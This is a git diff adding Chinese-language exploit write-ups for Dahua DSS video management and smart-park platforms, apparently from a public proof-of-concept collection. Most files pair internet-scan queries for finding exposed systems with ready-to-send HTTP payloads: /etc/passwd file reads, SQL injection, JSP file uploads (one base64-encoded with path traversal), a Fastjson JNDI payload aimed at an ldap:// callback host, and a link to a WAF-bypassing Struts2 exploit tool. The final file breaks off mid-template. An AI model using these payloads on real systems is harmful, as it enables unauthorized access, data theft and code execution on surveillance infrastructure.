diff --git a/大华DSS视频管理系统attachment_downloadByUrlAtt.action任意文件下载漏洞.md b/大华DSS视频管理系统attachment_downloadByUrlAtt.action任意文件下载漏洞.md
new file mode 100644
index 0000000..3865b7b
--- /dev/null
+++ b/大华DSS视频管理系统attachment_downloadByUrlAtt.action任意文件下载漏洞.md
@@ -0,0 +1,28 @@
+# 大华 DSS 视频管理系统 attachment_downloadByUrlAtt.action 任意文件下载漏洞
+
+# 一、漏洞简介
+大华 DSS 视频管理系统存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件
+
+# 二、影响版本
++ 大华 DSS 视频管理系统
+
+# 三、资产测绘
++ hunter：`app.name=="Dahua 大华 DSS 视频管理系统"`
+
+![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/1dbzkkAvGIjPSiqY/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-774106.png)
+
++ 登录页面
+
+![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/1dbzkkAvGIjPSiqY/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-214312.png)
+
+# 四、漏洞复现
+```plain
+/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
+```
+
+![1692014263697-ee82b115-ec78-4aa1-89bd-220bac635887.png](./img/1dbzkkAvGIjPSiqY/1692014263697-ee82b115-ec78-4aa1-89bd-220bac635887-605046.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mb3iwwsxiz2bvrek>
\ No newline at end of file
diff --git a/大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md b/大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md
new file mode 100644
index 0000000..7e4a8a1
--- /dev/null
+++ b/大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md
@@ -0,0 +1,45 @@
+# 大华 DSS 视频管理系统attachment_getAttList存在SQL注入漏洞
+
+# 一、漏洞简介
+大华 DSS 视频管理系统attachment_getAttList存在SQL注入漏洞
+
+# 二、影响版本
++ 大华 DSS 视频管理系统
+
+# 三、资产测绘
++ hunter：`app.name=="Dahua 大华 DSS 视频管理系统"`
+
+![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/YEzgKXOoTrWvTvW9/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-455011.png)
+
++ 登录页面
+
+![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/YEzgKXOoTrWvTvW9/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-535720.png)
+
+# 四、漏洞复现
+```java
+GET /portal/attachment_getAttList.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x5c,0x716b6b6b71,(SELECT%20(ELT(8841=8841,1))),0x7178786271))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Length: 345
+Accept-Encoding: gzip
+```
+
+![1712506894859-ae95ce46-c10f-470e-b0c3-73ac9f6f6f0b.png](./img/YEzgKXOoTrWvTvW9/1712506894859-ae95ce46-c10f-470e-b0c3-73ac9f6f6f0b-091764.png)
+
+```java
+qkkkq1qxxbq
+```
+
+sqlmap
+
+```java
+/portal/attachment_getAttList.action?bean.RecId=1&bean.TabName=1
+```
+
+![1712506949280-220d14ff-c8ae-4bcc-a97b-988a8f0e5f4b.png](./img/YEzgKXOoTrWvTvW9/1712506949280-220d14ff-c8ae-4bcc-a97b-988a8f0e5f4b-184673.png)
+
+
+
+> 更新: 2024-04-28 16:08:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fqfir04lszoxzfkb>
\ No newline at end of file
diff --git a/大华DSS视频管理系统deleteBulletin存在SQL注入漏洞.md b/大华DSS视频管理系统deleteBulletin存在SQL注入漏洞.md
new file mode 100644
index 0000000..3c01ab4
--- /dev/null
+++ b/大华DSS视频管理系统deleteBulletin存在SQL注入漏洞.md
@@ -0,0 +1,82 @@
+# 大华 DSS 视频管理系统deleteBulletin存在SQL注入漏洞
+
+# 一、漏洞简介
+大华 DSS 视频管理系统deleteBulletin存在SQL注入漏洞。
+
+# 二、影响版本
++ 大华 DSS 视频管理系统
+
+# 三、资产测绘
++ hunter：`app.name=="Dahua 大华 DSS 视频管理系统"`
+
+![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/GZOXqaqQQLQw2K7e/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-783855.png)
+
++ 登录页面
+
+![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/GZOXqaqQQLQw2K7e/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-487732.png)
+
+# 四、漏洞复现
+```plain
+POST /portal/services/itcBulletin HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=0F29FE3B0C2BF1E508A7119E327E2B44; JSESSIONID=D08F471237625640BE6F9DE648EC1EE6
+Upgrade-Insecure-Requests: 1
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 436
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:itc="http://itcbulletinservice.webservice.dssc.dahua.com">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <itc:deleteBulletin>
+         <!--type: string-->
+         <netMarkings>(UPDATEXML(5791,CONCAT(0x2e,0x716b706a71,(SELECT (ELT(5791=5791,1))),0x716a707a71),1058))</netMarkings>
+      </itc:deleteBulletin>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1705141455973-c800e162-98db-44fe-911e-6cd0f90f3cd6.png](./img/GZOXqaqQQLQw2K7e/1705141455973-c800e162-98db-44fe-911e-6cd0f90f3cd6-633800.png)
+
+```plain
+qkpjq1qjpzq
+```
+
+sqlmap
+
+```plain
+POST /portal/services/itcBulletin HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=0F29FE3B0C2BF1E508A7119E327E2B44; JSESSIONID=D08F471237625640BE6F9DE648EC1EE6
+Upgrade-Insecure-Requests: 1
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 346
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:itc="http://itcbulletinservice.webservice.dssc.dahua.com">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <itc:deleteBulletin>
+         <!--type: string-->
+         <netMarkings>gero et</netMarkings>
+      </itc:deleteBulletin>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1705141497116-edc5d6fd-4ef0-4ca2-9084-2590cdabbc57.png](./img/GZOXqaqQQLQw2K7e/1705141497116-edc5d6fd-4ef0-4ca2-9084-2590cdabbc57-522695.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xdk0wmobv78llhqb>
\ No newline at end of file
diff --git a/大华DSS视频管理系统user_edit存在密码泄漏漏洞.md b/大华DSS视频管理系统user_edit存在密码泄漏漏洞.md
new file mode 100644
index 0000000..49f5423
--- /dev/null
+++ b/大华DSS视频管理系统user_edit存在密码泄漏漏洞.md
@@ -0,0 +1,36 @@
+# 大华 DSS 视频管理系统user_edit存在密码泄漏漏洞
+
+# 一、漏洞简介
+DSS是大华的大型监控管理应用平台，支持几乎所有涉及监挂控等方面的操作，支持多级跨平台联网等操作。可将视频监控、卡口拍照、区间测速、电子地图、违章查询系统等诸多主流应用整合在一起，实现更加智能、便捷的分级查询服务。大华 DSS 视频管理系统user_edit存在密码泄漏漏洞。
+
+# 二、影响版本
++ 大华 DSS 视频管理系统
+
+# 三、资产测绘
++ hunter：`app.name=="Dahua 大华 DSS 视频管理系统"`
+
+![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/dRGl6TsAKBTx2w2n/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-550589.png)
+
++ 登录页面
+
+![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/dRGl6TsAKBTx2w2n/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-260486.png)
+
+# 四、漏洞复现
+```plain
+GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=1B1D0EBCE3AC082FDBA00062678EAAC9; JSESSIONID=48C3365B18E192DAAB020C90A2BF0DEF
+Upgrade-Insecure-Requests: 1
+```
+
+![1707058843442-6c8106c8-b015-4036-9378-3693a95273aa.png](./img/dRGl6TsAKBTx2w2n/1707058843442-6c8106c8-b015-4036-9378-3693a95273aa-811566.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsq90pf8xgsyfgix>
\ No newline at end of file
diff --git a/大华DSS视频管理系统存在strust2命令执行漏洞.md b/大华DSS视频管理系统存在strust2命令执行漏洞.md
new file mode 100644
index 0000000..7eb2354
--- /dev/null
+++ b/大华DSS视频管理系统存在strust2命令执行漏洞.md
@@ -0,0 +1,32 @@
+# 大华 DSS 视频管理系统 存在strust2命令执行漏洞
+
+# 一、漏洞简介
+大大华 DSS 视频管理系统 存在strust2命令执行漏洞，攻击者通过漏洞获取服务器权限。
+
+# 二、影响版本
++ 大华 DSS 视频管理系统
+
+# 三、资产测绘
++ hunter：`app.name=="Dahua 大华 DSS 视频管理系统"`
+
+![1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png](./img/mc9SKA2jC6nV7nKC/1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc-976561.png)
+
++ 登录页面
+
+![1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png](./img/mc9SKA2jC6nV7nKC/1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590-628349.png)
+
+# 四、漏洞复现
+漏洞地址
+
+```java
+/portal/login_init.action
+```
+
+[Strruts2全版本漏洞测试工具17-6过WAF版.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222238928-6658bffd-c0ae-4391-a18e-74f0966c3be6.jar)
+
+![1701919580383-8d8fc9c5-c0a8-4d72-ae0b-8631dbf07114.png](./img/mc9SKA2jC6nV7nKC/1701919580383-8d8fc9c5-c0a8-4d72-ae0b-8631dbf07114-425195.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mg5fcbpsfxg6xgzl>
\ No newline at end of file
diff --git a/大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞.md b/大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞.md
new file mode 100644
index 0000000..a2b6f91
--- /dev/null
+++ b/大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞.md
@@ -0,0 +1,41 @@
+# 大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞
+
+大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+app="dahua-智慧园区综合管理平台"
+```
+
+## poc
+
+```java
+POST /portal/updateOcx_updateCab.action HTTP/1.1
+Host: xx.xx.xx.xx
+Accept-Encoding: identity
+Content-Length: 429
+Accept-Language: zh-CN,zh;q=0.8
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
+Connection: keep-alive
+Referer: http://www.baidu.com
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=9b1d729ed9954863bcbedbb523cec7fa
+
+--9b1d729ed9954863bcbedbb523cec7fa
+Content-Disposition: form-data; name="updateBean.loadCabFileName"
+
+sAuyJk.jsp
+--9b1d729ed9954863bcbedbb523cec7fa
+Content-Disposition: form-data; name="updateBean.loadCab"; filename="sAuyJk.jsp"
+Content-Type: text/plain
+
+<% out.println(75471+90776+"tnMXedOsifiHeptP");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+--9b1d729ed9954863bcbedbb523cec7fa--
+```
+
+文件地址  20240801102132 文件上传时间戳
+
+`http://xx.xx.xx.xx/portal/ocx/20240801102132/sAuyJk.jsp`
\ No newline at end of file
diff --git a/大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞.md b/大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞.md
new file mode 100644
index 0000000..b9f0e9e
--- /dev/null
+++ b/大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞.md
@@ -0,0 +1,41 @@
+# 大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞
+
+大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+app="dahua-智慧园区综合管理平台"
+```
+
+## poc
+
+```java
+POST /portal/updateOcx_updateZip.action HTTP/1.1
+Host: xx.xx.xx.xx
+Accept-Encoding: identity
+Content-Length: 431
+Accept-Language: zh-CN,zh;q=0.8
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
+Connection: keep-alive
+Referer: http://www.baidu.com
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=9aa1b50e33144fb18837cc97ed863df7
+
+--9aa1b50e33144fb18837cc97ed863df7
+Content-Disposition: form-data; name="updateBean.compressFileName"
+
+KgJrYe.jsp
+--9aa1b50e33144fb18837cc97ed863df7
+Content-Disposition: form-data; name="updateBean.compress"; filename="KgJrYe.jsp"
+Content-Type: text/plain
+
+<% out.println(32461+18843+"eiaDXmEZEvlnjVVz");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+--9aa1b50e33144fb18837cc97ed863df7-
+```
+
+文件地址  20240801102132 文件上传时间戳
+
+`http://xx.xx.xx.xx/portal/ocx/20240801102132/KgJrYe.jsp`
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md b/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md
index 498e742..407855d 100644
--- a/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md	
+++ b/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md	
@@ -1,4 +1,13 @@
 ## 大华智慧园区综合管理平台 searchJson SQL注入漏洞
+
+## fofa
+
+```javascript
+app="dahua-智慧园区综合管理平台"
+```
+
+## poc
+
 ```
 GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
 Host: 127.0.0.1:7443
diff --git a/大华智慧园区综合管理平台 文件上传漏洞.md b/大华智慧园区综合管理平台 文件上传漏洞.md
index c9adbd6..f86a907 100644
--- a/大华智慧园区综合管理平台 文件上传漏洞.md	
+++ b/大华智慧园区综合管理平台 文件上传漏洞.md	
@@ -1,4 +1,13 @@
 ## 大华智慧园区综合管理平台 文件上传漏洞
+
+## fofa
+
+```javascript
+app="dahua-智慧园区综合管理平台"
+```
+
+## poc
+
 ```
 POST /publishing/publishing/material/file/video HTTP/1.1
 Host: 127.0.0.1:7443
diff --git a/大华智慧园区综合管理平台-deleteFtp-远程命令执行漏洞.md b/大华智慧园区综合管理平台-deleteFtp-远程命令执行漏洞.md
new file mode 100644
index 0000000..e67f202
--- /dev/null
+++ b/大华智慧园区综合管理平台-deleteFtp-远程命令执行漏洞.md
@@ -0,0 +1,23 @@
+## 大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞
+
+## fofa
+```
+body="src=/WPMS/asset/common/js/jsencrypt.min.js"
+```
+
+## poc
+```
+POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
+Host: Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9Cookie: yourCookieConnection: close
+Content-Type: application/json
+Content-Length: 189
+
+{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x.x.x.x","autoCommit":true}}}
+```
+
+`ldap://x.x.x.x` 填入dnslog地址 ，发送poc dnslog有请求说明存在漏洞
diff --git a/大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md b/大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md
new file mode 100644
index 0000000..498e742
--- /dev/null
+++ b/大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md
@@ -0,0 +1,8 @@
+## 大华智慧园区综合管理平台 searchJson SQL注入漏洞
+```
+GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
+Host: 127.0.0.1:7443
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip, deflate
+Connection: close
+```
diff --git a/大华智慧园区综合管理平台-文件上传漏洞.md b/大华智慧园区综合管理平台-文件上传漏洞.md
new file mode 100644
index 0000000..c9adbd6
--- /dev/null
+++ b/大华智慧园区综合管理平台-文件上传漏洞.md
@@ -0,0 +1,24 @@
+## 大华智慧园区综合管理平台 文件上传漏洞
+```
+POST /publishing/publishing/material/file/video HTTP/1.1
+Host: 127.0.0.1:7443
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 804
+Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
+Accept-Encoding: gzip, deflate
+Connection: close
+
+--dd8f988919484abab3816881c55272a7
+Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"
+
+<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+--dd8f988919484abab3816881c55272a7
+Content-Disposition: form-data; name="poc"
+
+poc
+--dd8f988919484abab3816881c55272a7
+Content-Disposition: form-data; name="Submit"
+
+submit
+--dd8f988919484abab3816881c55272a7--
+```
diff --git a/大华智慧园区综合管理平台attachment_downloadAtt.action任意文件读取.md b/大华智慧园区综合管理平台attachment_downloadAtt.action任意文件读取.md
new file mode 100644
index 0000000..45bc759
--- /dev/null
+++ b/大华智慧园区综合管理平台attachment_downloadAtt.action任意文件读取.md
@@ -0,0 +1,34 @@
+# 大华智慧园区综合管理平台attachment_downloadAtt.action 任意文件读取
+
+# 一、漏洞简介
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台attachment_downloadAtt.action 存在任意文件读取漏洞
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter:`app.name="Dahua 大华 智慧园区管理平台"`  
+![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/jaCC7DXDDmfvY9yI/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-356915.png)
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/jaCC7DXDDmfvY9yI/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-333076.png)
+
+# 四、漏洞复现
+```plain
+GET /portal/attachment_downloadAtt.action?filePath=/etc/passwd HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=ABB59960633C3E7734D10072A90C5E31; JSESSIONID=4405A0D40C98D16E75E036C95FB89669
+Upgrade-Insecure-Requests: 1
+```
+
+![1699421293209-2b66f6f8-c519-4d64-b573-e1d6f956d566.png](./img/jaCC7DXDDmfvY9yI/1699421293209-2b66f6f8-c519-4d64-b573-e1d6f956d566-646472.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yxprolu54446xcih>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台attachment_downloadByUrlAtt.action任意文件读取.md b/大华智慧园区综合管理平台attachment_downloadByUrlAtt.action任意文件读取.md
new file mode 100644
index 0000000..6bb850a
--- /dev/null
+++ b/大华智慧园区综合管理平台attachment_downloadByUrlAtt.action任意文件读取.md
@@ -0,0 +1,39 @@
+# 大华智慧园区综合管理平台attachment_downloadByUrlAtt.action 任意文件读取
+
+# 一、漏洞简介
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台attachment_downloadByUrlAtt.action 存在任意文件读取漏洞
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter:`app.name="Dahua 大华 智慧园区管理平台"`  
+![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/OVodldMk_3aAoGNG/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-503279.png)
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/OVodldMk_3aAoGNG/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-932812.png)
+
+# 四、漏洞复现
+```plain
+GET /portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/ HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: JSESSIONID=E6205C47507484A3593288B704F31990
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1699360291610-53699093-c625-42fd-a637-afc57fe2571e.png](./img/OVodldMk_3aAoGNG/1699360291610-53699093-c625-42fd-a637-afc57fe2571e-251069.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lowupyok2gqtndzo>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台bitmap任意文件上传漏洞.md b/大华智慧园区综合管理平台bitmap任意文件上传漏洞.md
new file mode 100644
index 0000000..6591aa0
--- /dev/null
+++ b/大华智慧园区综合管理平台bitmap任意文件上传漏洞.md
@@ -0,0 +1,65 @@
+# 大华智慧园区综合管理平台bitmap任意文件上传漏洞
+
+# 一、漏洞描述
+大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台，旨在为园区提供一站式解决方案，包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。 <font style="color:rgba(0, 0, 0, 0.9);">大华智慧园区综合管理平台在/emap/webservice/gis/soap/bitmap接口处存在任意文件上传漏洞，可以利用此漏洞获得webshell。</font>
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
++ hunter:`app.name="Dahua 大华 智慧园区管理平台"`  
+![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/HG23J_nyhrdo58lW/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-560053.png)
++ 登录页面：
+
+![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/HG23J_nyhrdo58lW/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-864747.png)
+
+# 四、漏洞复现
+```plain
+POST /emap/webservice/gis/soap/bitmap HTTP/1.1
+Cookie: JSESSIONID=C30EF0C843ACBDC71597DEE0CBDADE8C
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 628
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <res:uploadPicFile>
+         <arg0>
+ <picName>stc.jsp</picName>
+                    <!--type: string-->
+                    <picPath>/../stc.jsp</picPath>
+         </arg0>
+         <!--type: base64Binary-->
+         <arg1>PCVvdXQucHJpbnQoOTk5Kjk5OSk7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPg==</arg1>
+      </res:uploadPicFile>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1705066652548-ea581a8b-7dda-47d8-ba5c-4146ca15a392.png](./img/HG23J_nyhrdo58lW/1705066652548-ea581a8b-7dda-47d8-ba5c-4146ca15a392-879908.png)
+
+上传文件位置
+
+```plain
+/upload/stc.jsp
+```
+
+![1705066683323-27e6d62e-6195-4d8c-a4ed-f17ec4a35ab1.png](./img/HG23J_nyhrdo58lW/1705066683323-27e6d62e-6195-4d8c-a4ed-f17ec4a35ab1-230024.png)
+
+
+
+> 更新: 2024-02-29 23:57:19  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ygkzgd2uu9gcxavq>
\ No newline at end of file
diff --git a/大华智慧园区综合管理平台deleteBulletinSQL注入漏洞.md b/大华智慧园区综合管理平台deleteBulletinSQL注入漏洞.md
new file mode 100644
index 0000000..05a9512
--- /dev/null
+++ b/大华智慧园区综合管理平台deleteBulletinSQL注入漏洞.md
@@ -0,0 +1,49 @@
+# 大华智慧园区综合管理平台deleteBulletin SQL注入漏洞
+
+# 一、漏洞简介
+  “大华智慧园区综合管理平台”是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配，满足多元化的管理需求，同时通过提供智能服务，增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息，进一步利用可能获取目标系统权限。
+
+# 二、影响版本
++ 大华智慧园区综合管理平台
+
+# 三、资产测绘
